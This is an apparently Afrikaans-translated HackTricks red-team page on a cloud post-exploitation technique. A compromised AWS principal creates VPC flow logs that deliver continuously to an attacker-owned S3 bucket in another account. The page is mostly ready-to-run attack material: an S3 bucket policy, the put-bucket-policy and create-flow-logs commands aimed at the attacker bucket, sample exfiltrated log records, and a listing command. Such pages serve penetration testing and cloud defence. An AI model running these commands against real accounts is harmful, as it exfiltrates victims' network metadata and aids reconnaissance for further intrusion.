AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Opsomming

Misbruik ec2:CreateFlowLogs om VPC-, subnet- of ENI flow logs direk na ’n aanvallerbeheer S3-bucket te exporteer. Sodra die delivery role gekonfigureer is om na die eksterne bucket te skryf, word elke verbinding wat op die gemoniteerde hulpbron gesien word, uit die victim account uitgestroom.

Vereistes

  • Victim principal: ec2:CreateFlowLogs, ec2:DescribeFlowLogs, and iam:PassRole (if a delivery role is required/created).
  • Attacker bucket: S3 policy that trusts delivery.logs.amazonaws.com with s3:PutObject and bucket-owner-full-control.
  • Opsioneel: logs:DescribeLogGroups if exporting to CloudWatch instead of S3 (not needed here).

Aanvalsstap-vir-stap

  1. Attacker stel ’n S3-bucketbeleid op (in attacker account) wat die VPC Flow Logs delivery service toelaat om objekte te skryf. Vervang plaashouers voordat u dit toepas:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowVPCFlowLogsDelivery",
"Effect": "Allow",
"Principal": { "Service": "delivery.logs.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
"Condition": {
"StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
}
}
]
}

Pas toe vanaf die attacker account:

aws s3api put-bucket-policy \
--bucket <attacker-bucket> \
--policy file://flowlogs-policy.json
  1. Victim (compromised principal) skep die flow logs wat die attacker bucket teiken:
REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>
ROLE_ARN=<delivery-role-with-logs-permissions>   # Must allow delivery.logs.amazonaws.com to assume it
aws ec2 create-flow-logs \
--resource-type VPC \
--resource-ids "$VPC_ID" \
--traffic-type ALL \
--log-destination-type s3 \
--log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
--deliver-logs-permission-arn "$ROLE_ARN" \
--region "$REGION"

Binne minute verskyn flow log-lêers in die attacker bucket wat verbindings bevat vir alle ENIs in die gemonitorde VPC/subnet.

Bewyse

Voorbeeld flow log-opnames wat na die attacker bucket geskryf is:

version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK

Bewys van Bucket-lys:

aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize

Impak

  • Voortdurende netwerkmetadata exfiltration (bron/bestemming IP-adresse, poorte, protokolle) vir die gemonitorde VPC/subnet/ENI.
  • Maak verkeersontleding, identifisering van sensitiewe dienste en potensiële soektog na security group-miskonfigurasies van buite die geaffekteerde rekening moontlik.

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks